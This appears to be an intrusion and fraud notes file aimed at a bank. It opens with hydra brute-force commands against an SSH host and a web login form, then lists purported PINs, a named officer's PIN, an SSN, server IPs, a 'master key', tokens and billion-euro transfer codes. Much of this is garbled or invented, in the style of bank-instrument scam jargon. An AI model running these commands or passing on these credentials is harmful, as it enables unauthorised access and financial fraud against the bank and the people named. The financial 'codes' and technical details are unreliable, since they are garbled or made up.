
hydra 193.150.166.1 ssh -l 493069K1 -p 02569S -s 22 -V -v -t 1
hydra -l admin -P /usr/share/wordlists/rockyou.txt 34.111.230.211 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -v -t 1

# Accesos
- AUTHORIZATION PIN: 02569S
- SSN: 0211676
- AUTHORIZED SIGNATURE OFFICER: MR. JAMES VON MOLTKE (PIN: 54082) CFO
- USER NAME: 493069K1
- USER ID: FGN470
- LOGIN Domain: DEUBA
- LOGON Server: FRAESWDBRP 21

# Servidores
- DNS server Domain: 160.83.58.33
- SSH: 193.150.166.1
- Server Global IP: 193.150.166.0/24 / 193.150.167.255
- Server Global ID (ORIGIN): AS8373
- ns1.db.com.de (193.112.95.1)
- ns21.db.net (204.13.250.141)
- ns21.db.uk (204.13.251.141)
- ns20.db.net (208.78.70.141)
- ns20.db.uk (208.78.71.141)
- ns11.db.com.de (193.112 90.4)

# Palabras Claves
- TRANSACTION ID: 090s12500700100958886479
- DB IDENTITY CODE: 27C DB FR DE 17BEN
- Client No.: 000000000SRTRN38837862BEH1RLN000000
- Certificate Chain
- Cipher: ECDHE-RSA-AES256-GCM-OUR384
- Master-Key: H858hfhg0ht40588hhfjpfhhd9944940jf
- FINAL BLOCKING CODE: 144A:S:G4639DVY8
- TREASURY AGREEMENT: CR38828530
- FILE NO: AS23F17.01.31.47.GTFS
- RELEASE CODE: 4jv9xltr5
- ACCESS CODE: bar 1588623
- IMAD NUMBER: CR38828530

# Medios de Conexión
- Port: 443
- SSL handshake has read 5679 bytes and written 526 bytes
- New, TLSv/SSLv3, Cipher is ECDHE-RSA-AES256-GCMOUR364
- Server Public key is 2052 bit
- Secure Renegotiation ended
- Compression: NONE
- Expansion: NONE
- SSL-Session: OK

# Otros Datos Importantes
- Value Date/End Time: +++ 01/12/2023 +++ 15:23:41 +01:00 (Gmt)
- AMOUNT: 1,000,000,000.00 EURO
- TRANSACTION REFERENCE NUMBER: DEUT0587373854812645693746539
- BANK OPERATION CODE: USCSY-GGSB1.DBFF100T.EUR/GG24314
- CURRENCY / AMOUNT: €1,000,000,000.00 (ONE BILLION EURO)
- Server ID: AS8373
- Server IP: 193.150.166.0/24/193.150 166.0/243
- WTS Server (Window terminal server): S020005636
- Credit Institute DB Germany: PTRSE/ ORACLE EBICS
- Download Code: AM-7263-L-49088-13410-95471
- Terminal ID: D48238FD7089E7E24b5
- Transfer Amount: 1,000,000,000.00 EURO
- FED Code: F – 2100100 5154. G943 – 1069 – 9543 – 8969 – 342
- International Deposit Code: DB79056588 DTSZS / N°. 79056 - CA - 79055
- Deposit Transaction No: DB33-9089-98JD-GO93-2298-1190
- Message Reference: 4874236859423957
- CHIPS: 84529376525243MMMO MO
- MILLION/BILLION DEPARTMENT FRANKFURT: ART/Y-LAW-21-FRANKFURT GOVERNMENT.TCL.75342
- ONE TIME SATELLITE SWIFT DOWNLOAD ACCESS WITHDRAWAL CODE: 9573020414B9.0XC4329637ED9DB984

# Tokens
- OAuth2 Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
- OAuth Token: 2YotnFZFEjr1zCsicMWpAA
